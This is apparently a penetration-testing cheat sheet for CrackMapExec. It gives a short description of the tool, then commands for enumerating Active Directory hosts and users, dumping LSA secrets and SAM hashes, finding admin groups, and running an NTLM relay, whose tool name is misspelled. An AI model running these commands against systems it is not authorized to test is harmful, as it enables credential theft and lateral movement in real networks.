CrackMapExec, often abbreviated as CME, is a powerful post-exploitation and penetration testing tool included in Kali Linux that is widely used for assessing large Active Directory networks. It acts as a Swiss army knife for network reconnaissance, credential validation, and exploitation by automating many common tasks that attackers and security professionals face during engagements. CME is particularly useful because it allows testers to quickly determine the reach of compromised credentials, identify systems that may be vulnerable, and interact with network services such as SMB, RDP, WinRM, and more, all from a single interface. This makes it invaluable in red team operations where efficiency and stealth are essential.
Beyond simple credential testing, CrackMapExec can execute commands remotely, dump password hashes, enumerate shares, and even deploy payloads across multiple hosts in a domain environment. Its ability to scale across large enterprise networks makes it a go-to tool for simulating real-world attacker behavior and identifying security weaknesses before adversaries can exploit them. While powerful, CME is meant to be used ethically within authorized penetration testing or security auditing contexts, as misuse of the tool could result in unauthorized access to sensitive systems and data.
You must have a users password or hash to use this utility.
CrackMapExec Commands
<!-- How ot install -->
sudo apt install crackmapexec
<!-- Find all computers -->
crackmapexec smb ip-range/24
<!-- Get list of all users in domain (May not work) -->
crackmapexec smb ip-range/24 -u '' -p ''
<!-- Once you have admin rights - See who is logged in-->
crackmapexec smb target-ip -u username -p password --loggedon-users
<!-- If you are workstation admin (Local Security Authority) -->
crackmapexec smb target-ip -u username -p password --lsa
<!-- Find all computers user has admin right to -->
crackmapexec smb ip-range/24 -u username -d domain-name.local -p password
<!-- Dump the SAM file -->
crackmapexec smb ip-range/24 -u username -d domain-name.local -p password --sam
<!--Ping the Domain Controller to find open ports -->
nmap -Pn <target IP>
<!--Get SMB info on Domain Controller -->
crackmapexec smb <target IP>
<!--Check which devices have SMB enabled -->
crackmapexec smb 192.168.x.1-192.168.x.254
<!-Go after any computer with (signing:False) -->
impacket-ntmlrelayx -t smb://target-ip -smbsupport
<!-- Check is Secured LDAP is enabled -->
crackmapexec ldap <IP> -M ldap-signing
<!-- Get domain admins -->
crackmapexec smb <ip> -u <username> -p <pass> --groups 'Domain Admins'
<!-- Get admin groups -->
crackmapexec ldap <ip> -u <username> -p <pass> --admin-count
<!-- Get machine account quotas -->
crackmapexec ldap <IP> -u <username> -p <PASS> -M MAQ